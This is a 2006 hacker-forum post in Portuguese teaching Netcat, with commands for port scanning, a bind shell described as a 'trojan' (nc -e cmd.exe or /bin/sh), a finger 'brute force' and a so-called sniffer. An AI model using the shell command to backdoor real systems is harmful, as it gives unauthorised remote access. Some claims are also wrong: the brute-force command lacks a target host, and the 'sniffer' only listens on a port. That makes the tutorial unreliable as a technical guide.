infected
Recien llegado
 Desconectado
Mensajes: 4
Member, pOrtal HAcker
|
 |
« : 27 de Febrero de 2006, 08:44:57 » |
|
Olá meu nome é Huandersson, falarei sobre o NetCat que é considerado pelos hackers o canivete suÃço do TCP/IP, devido a sua incrÃvel versatilidade, com o NC(NetCat), podemos fazer um scanner de portas, um trojan, um brute force, entre outras coisas.
Vamos dar uma olhada nos comandos do netcat, a opção -H exibe as opções do programa. Basta digitar nc -h e dar enter.
Veremos os principais comandos do netcat:
l = Coloca uma porta em estado de listenning(escuta)
L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche
P = Define uma porta
V = ativa o recebimento de eco
U = utiliza o protocolo UDP ao invés de TCP
T = para se conectar a TELNET
O = Gera um log em formato hexadecimal
W = Determina um tempo máximo para aguardar uma reposta
E = Redireciona arquivos
D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.
Bem, agora que já conhecemos os comandos mais usados do netcat vamos a pratica:
Colocando uma porta em escuta:
Nc -l -p 8080 isso faria com que o netcat colocasse a porta 8080 em escuta, note que foi usado -v para que fosse mostrado a saÃda do programa na tela "listening on [any] 8080 ...", caso a opção -v não fosse inserida este texto não seria mostrado.
Fazendo um Port-Scanner com o netcat
nc -vv 127.0.0.1 1-6550 isso faz um scanner da porta 1 à6550 mais você também pode selecionar as portas que deseja escanear dando um espaço entre os intervalos de portas a ser escaneados ex: nc -vv 127.0.0.1 21 80 23 79 25 isso faria um scanner nas portas 80, 23, 79 e 25.
Fazendo um trojan com o netcat
Note que basta redirecionar todo o trafego de uma porta enviando a cmd.exe se for windows e bin/bash.sh se for UNIX a sintaxe é a seguinte em sistemas windows nc -L -p 1024 -e cmd.exe e nc -l -p 1024 -e bin/sh em UNIX.
Fazendo um ataque de brute force com o netcat
O canivete suÃço do TCP/IP tem muitas funções interessante uma delas é o brute force um exemplo: nc -vv 79 < c:\usuarios.txt > c:\log.txt note que você precisara de um arquivos com nome de usuários em c: e todo log será gravado em c:\log.txt para que você possa analisar depois. esse força bruta foi feita em cima da porta 79 FINGER mais poderia ser facilmente adaptada a outras portas.
Fazendo um sniffer com o netcat
O fantástico netcat também pode servir como um sniffer e captura todo trafego em uma rede basta colocar nc -vv -L 127.0.0.1 -p 80 note que o L deve ser maiúsculo pois, esta opção reabre socketes fechados, isso fará com que o netcat capture todo trafego na porta 80 acho que nem é mais necessário dizer que podemos também gravar toda saÃda em um arquivo TXT, mais bem pra você que ainda não sacou a jogada ai vai nc -vv -L 127.0.0.1 -p 80 > c:\sniffer.txt
Conclusão
Como podemos ver o NETCAT é uma faca de dois gumes é pode ser usado pelos dois lados da força, este artigo mostrou em detalhes as principais utilidades do netcat mais vale frisar que não são as únicas utilidades, e com um pouco de imaginação podemos fazer verdadeiras façanhas com este verdadeiro canivete suÃço ...
|
Autor